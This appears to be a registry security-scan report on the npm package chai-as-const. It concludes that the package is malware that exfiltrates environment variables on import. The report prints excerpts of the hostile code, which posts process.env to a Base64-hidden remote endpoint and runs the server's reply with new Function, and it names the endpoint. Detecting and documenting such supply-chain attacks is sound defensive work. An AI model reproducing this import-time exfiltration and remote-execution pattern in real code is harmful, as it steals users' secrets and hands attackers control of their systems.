registry  /  chai-as-const  /  1.4.7

chai-as-const@1.4.7

This document describes the management of vulnerabilities for the project and all modules within the organization.

AI Security Review

scanned 13h ago · by lpm-firewall-ai

Importing the package immediately runs `lib/initializer.js`. It exfiltrates environment variables and executes attacker-controlled JavaScript returned by a remote server.

Static reason
One or more suspicious static signals were detected.
Trigger
Any runtime `require('chai-as-const')` or import resolving `index.js`.
Impact
Secrets in environment variables can be disclosed; the remote operator can execute arbitrary Node.js code with the importing process's permissions.
Mechanism
Import-time environment exfiltration followed by remote code execution.
Attack narrative
The main entry point imports `lib/initializer.js`, whose immediately invoked async function Base64-decodes a remote URL, posts all environment variables to it, then passes the response body to `new Function` and executes it with `require`. This is a concrete import-time remote payload channel, not a dormant scanner signature.
Rationale
Source directly establishes credential/environment exfiltration and remote arbitrary code execution on ordinary package import. The lack of an install hook does not mitigate this active runtime payload.
Evidence
index.jslib/initializer.jspackage.json
Network endpoints1
ipcheck-hashed.vercel.app/api/identity/b4dadd6a26d820d08596

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js:6` imports `lib/initializer.js` during normal package import.
  • `lib/initializer.js:7-10` POSTs the entire `process.env` object to a Base64-hidden remote endpoint.
  • `lib/initializer.js:13-14` compiles and executes the server response with `new Function` and `require`.
  • `package.json` has no lifecycle hook; the malicious chain instead runs at import time.
  • `index.js:41-47` contains a commented detached child-process launcher, consistent with prior background execution intent.
Evidence against
  • No package lifecycle scripts are declared.
  • The inspected active payload does not write files or modify AI-agent configuration.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 16 file(s), 52.4 KB of source, external domains: github.com

Source & flagged code

5 flagged · loading source
index.jsView file
3const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants');
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L3
lib/initializer.jsView file
2L3: const axios = require("axios"); L4: const configEndpoint = "[redacted]=="; ... L8: Buffer.from(configEndpoint, 'base64').toString('utf-8'), L9: { ...process.env }, L10: { headers: { "x-secret-header" : "secret" } } ... L12: try { L13: const executor = new Function("require", response.data); L14: executor(require);
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/initializer.jsView on unpkg · L2
2L3: const axios = require("axios"); L4: const configEndpoint = "[redacted]=="; ... L6: (async function initializer(..._args) { L7: const response = await axios.post( L8: Buffer.from(configEndpoint, 'base64').toString('utf-8'), L9: { ...process.env }, L10: { headers: { "x-secret-header" : "secret" } } ... L12: try { L13: const executor = new Function("require", response.data); L14: executor(require);
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/initializer.jsView on unpkg · L2
12try { L13: const executor = new Function("require", response.data); L14: executor(require);
Low
Eval

Package source references a known benign dynamic code generation pattern.

lib/initializer.jsView on unpkg · L12
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

3 High3 Medium4 Low
HighChild Processindex.js
HighSame File Env Network Executionlib/initializer.js
HighBase64 Obscured Urllib/initializer.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowEvallib/initializer.js
LowHigh Entropy Strings
LowUrl Strings